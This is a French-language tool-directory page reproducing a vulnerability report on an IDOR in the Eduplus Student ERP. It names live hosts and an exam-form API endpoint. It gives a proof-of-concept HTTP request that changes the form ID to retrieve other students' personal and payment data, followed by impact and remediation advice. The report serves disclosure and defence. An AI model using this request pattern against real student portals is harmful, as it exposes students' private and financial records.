Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/sharma19d/cve-2026-35678
Analyse des VulnérabilitésExploitationCollecte d'InformationsSécurité WebTests d'Intrusion
GitHubsharma19d/cve-2026-35678

CVE-2026-35678

# Rapport détaillé de recherche de vulnérabilité sur un IDOR dans Eduplus Student ERP, incluant l'analyse technique, la preuve de concept (PoC), l'évaluation de l'impact et les recommandations de remédiation.

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Rapport de recherche de vulnérabilité : Référence directe d'objet non sécurisée (IDOR) dans tout le ERP étudiant Eduplus

Chercheur : Vinay Sharma

1. Résumé exécutif

Ce rapport détaille une vulnérabilité de sécurité de haute sévérité identifiée dans la plateforme ERP étudiant Eduplus, plus précisément dans le portail d'apprentissage étudiant (learnerapi.pceterp.in). L'application souffre d'une Référence directe d'objet non sécurisée (IDOR) universelle sur le point de terminaison de soumission de formulaire d'examen, permettant à tout utilisateur authentifié (étudiant) de récupérer les données personnelles et financières sensibles de tout autre étudiant en manipulant les identifiants de formulaire.

Cette vulnérabilité permet une collecte de données à grande échelle des dossiers étudiants, y compris les informations personnelles identifiables (PII) et les pistes d'audit détaillées des transactions financières.


2. Détails de la vulnérabilité

  • Hôte cible : learnerapi.pceterp.in, learner.zealerp.in, , etc.
learner.despu.edu.in
  • Point de terminaison affecté : POST /ExamForm/viewSubmitExamForm
  • Types de vulnérabilité :
    • Référence directe d'objet non sécurisée (IDOR) [CWE-639]
    • Cryptographie faible (AES-ECB avec clé codée en dur) [CWE-327, CWE-798]
    • Exposition de données sensibles [CWE-312]
  • Sévérité : Élevée (CVSS v3.1 estimé : 7,5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

  • 3. Analyse technique

    3.1 Référence directe d'objet non sécurisée (IDOR)

    La vulnérabilité réside dans le point de terminaison viewSubmitExamForm. Le serveur s'appuie sur deux paramètres fournis par le client pour identifier l'enregistrement à récupérer :

    1. Corps de la requête : {"formid": "XXXXX"}
    2. En-tête HTTP : Router-Path: /view-pcu-exam-form/XXXXX

    Bien que l'utilisateur doive être authentifié, le serveur ne vérifie pas si l'étudiant authentifié est autorisé à consulter les données associées au formid demandé. En itérant sur les identifiants numériques, un attaquant peut accéder aux dossiers d'autres étudiants.

    4. Preuve de concept (PoC)

    4.1 Exploitation de l'IDOR

    Une requête POST standard au point de terminaison vulnérable avec un formid modifié renvoie des données étudiantes sensibles.

    Requête :

    root@kitploit:~
    POST /ExamForm/viewSubmitExamForm HTTP/2
    Host: learnerapi.pceterp.in
    Content-Type: application/json
    Router-Path: /view-pcu-exam-form/28984
    ... (En-têtes authentifiés) ...
    
    {"formid":"28984"}
    

    Réponse (résumé des données divulguées) :

    root@kitploit:~
    {
      "status": "200",
      "examFormname": "B.Tech - Sem VI - Regular",
      "receipt_no": "REC/2023/54321",
      "feespaiddate": "2023-10-15",
      "ispaymentdone": {
        "username": "[email protected]",
        "received_amount": "1500.0",
        "updation_ip_address": "103.x.x.x",
        "erp_transaction_id": "ERP_998877",
        "bank_transaction_id": "BANK_ABC123",
        "paymentgateway_transaction_id": "PG_XYZ789",
        "learner": {
          "id": "12345"
        }
      }
    }
    
    5
    4
    3
    2
    1

    Téléversement de Idorpoc.mp4…


    5. Évaluation de l'impact

    L'exploitation réussie de cette vulnérabilité permet :

    • Exposition massive de PII : Accès aux noms, adresses e-mail, identifiants étudiants et adresses IP de connexion de l'ensemble du corps étudiant.
    • Violation de données financières : Exposition de l'historique des transactions, des identifiants bancaires et des références de passerelle de paiement. Ces informations sont hautement sensibles et pourraient être utilisées pour de l'ingénierie sociale financière ou de la fraude.
    • Violation de la vie privée académique : Accès non autorisé aux formulaires d'examen, aux affectations de mentors et aux statuts de soumission.

    6. Recommandations de remédiation

    6.1 Correction de l'autorisation (Priorité : Élevée)

    • Implémenter des contrôles d'autorisation côté serveur : Le backend doit vérifier que le formid demandé appartient au learnerid associé à la session active. Ne jamais faire confiance aux paramètres formid ou Router-Path sans validation par rapport au jeton de session authentifié.

    6.3 Durcissement général

    • Minimiser la sortie de données : S'assurer que l'API ne renvoie que les champs nécessaires à la vue d'interface utilisateur spécifique. Les identifiants de transaction internes et les adresses IP doivent être masqués sauf si absolument nécessaires au flux de travail de l'utilisateur.
    • Sécurité de session : Examiner l'utilisation d'en-têtes chiffrés personnalisés pour la gestion de session et envisager d'utiliser des JWT standard renforcés ou des cookies sécurisés HTTP-only.
    Télécharger l’outil